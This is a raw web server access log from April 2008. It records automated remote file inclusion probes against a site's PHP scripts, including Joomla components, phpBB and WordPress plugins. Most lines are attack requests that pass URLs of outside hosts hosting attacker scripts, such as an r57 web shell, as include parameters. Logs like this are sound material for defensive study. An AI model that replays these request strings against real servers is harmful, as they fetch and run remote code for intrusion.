62.75.224.203 - - [29/Apr/2008:11:43:57 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:43:58 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:43:58 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:44:03 -0700] "GET /logs/access_080101.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:11:45:03 -0700] "GET /logs/db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:11:45:03 -0700] "GET /db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:11:45:05 -0700] "GET /logs//main.php?sayfa=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:11:45:05 -0700] "GET //main.php?sayfa=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:45:24 -0700] "GET /logs/access_080214.log/index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:45:28 -0700] "GET /index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:45:35 -0700] "GET /logs/index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:45:41 -0700] "GET /logs/access_080215.log/index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.244.69.79 - - [29/Apr/2008:11:46:07 -0700] "GET /logs/access.loghttp://afterwedding.eclub.lv/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; .NET CLR 1.1.4322)" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:46:36 -0700] "GET /logs/access.log//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:46:42 -0700] "GET //main.php?sayfa=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:46:50 -0700] "GET /logs//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:47:16 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:47:16 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:47:18 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:47:18 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:47:25 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:47:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:47:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.241.172.8 - - [29/Apr/2008:11:47:30 -0700] "GET /logs//main.php?sayfa=http://computasiunair.com/paddy/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.172.8 - - [29/Apr/2008:11:47:31 -0700] "GET //main.php?sayfa=http://computasiunair.com/paddy/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:47:37 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:47:37 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:47:37 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
62.111.134.12 - - [29/Apr/2008:11:47:42 -0700] "GET /logs/access.log//infusions/stats_info_panel/log.inc.php?gethostbyaddr=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [29/Apr/2008:11:47:51 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/images/minipics/def_pics.gif/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.179.218 - - [29/Apr/2008:11:47:51 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/images/minipics/def_pics.gif/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:11:48:47 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:11:48:47 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:48:54 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:48:55 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.240.231.154 - - [29/Apr/2008:11:48:58 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [29/Apr/2008:11:48:58 -0700] "GET //skin/zero_vote/error.php?dir=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:49:00 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:49:00 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:11:49:10 -0700] "GET /logs/access_080201.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:49:11 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:49:11 -0700] "GET //citywriter/head.php?path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:49:11 -0700] "GET /logs//citywriter/head.php?path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:49:19 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:49:27 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:49:27 -0700] "GET //admin/index.php?o=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:49:28 -0700] "GET /logs//admin/index.php?o=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.16.215 - - [29/Apr/2008:11:49:32 -0700] "GET /megumi/earrings/?S=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.230.212.199 - - [29/Apr/2008:11:49:57 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:11:50:07 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:11:50:07 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.16.17.221 - - [29/Apr/2008:11:50:29 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://netbr.org/documents/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:11:50:37 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:11:50:48 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:11:50:48 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:51:40 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:51:40 -0700] "GET //config/dbutil.bck.php?confdir=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:51:40 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:51:46 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:51:46 -0700] "GET //ashnews.php?pathtoashnews=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:51:47 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.22.185 - - [29/Apr/2008:11:51:58 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.55 - - [29/Apr/2008:11:51:59 -0700] "GET /bikes/dteel/MVI_2430.AVI HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:52:01 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:52:22 -0700] "GET /logs//?pg=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 200 45273 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:52:23 -0700] "GET /logs//?pg=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 200 45273 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:52:24 -0700] "GET //?pg=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:52:26 -0700] "GET //?pg=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:11:52:30 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://cocreation.hk/id? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:53:01 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:11:53:08 -0700] "GET /logs/access_080329.log/db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:19 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:19 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:31 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:31 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:32 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:37 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:45 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:45 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:45 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:53:52 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:53:53 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:53:57 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:54:04 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:54:04 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:54:08 -0700] "GET /logs/access_080201.log/send_reminders.php?includedir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:54:08 -0700] "GET /send_reminders.php?includedir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:54:09 -0700] "GET /logs/send_reminders.php?includedir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:54:09 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:54:13 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:54:14 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:54:15 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:54:17 -0700] "GET /logs/access_080121.log/send_reminders.php?includedir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:54:20 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:11:54:23 -0700] "GET /logs/access_080225.log/db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:54:41 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:54:45 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:54:50 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:54:50 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:55:01 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:55:20 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:55:20 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:55:21 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:55:21 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:55:22 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:55:22 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:55:33 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:55:37 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
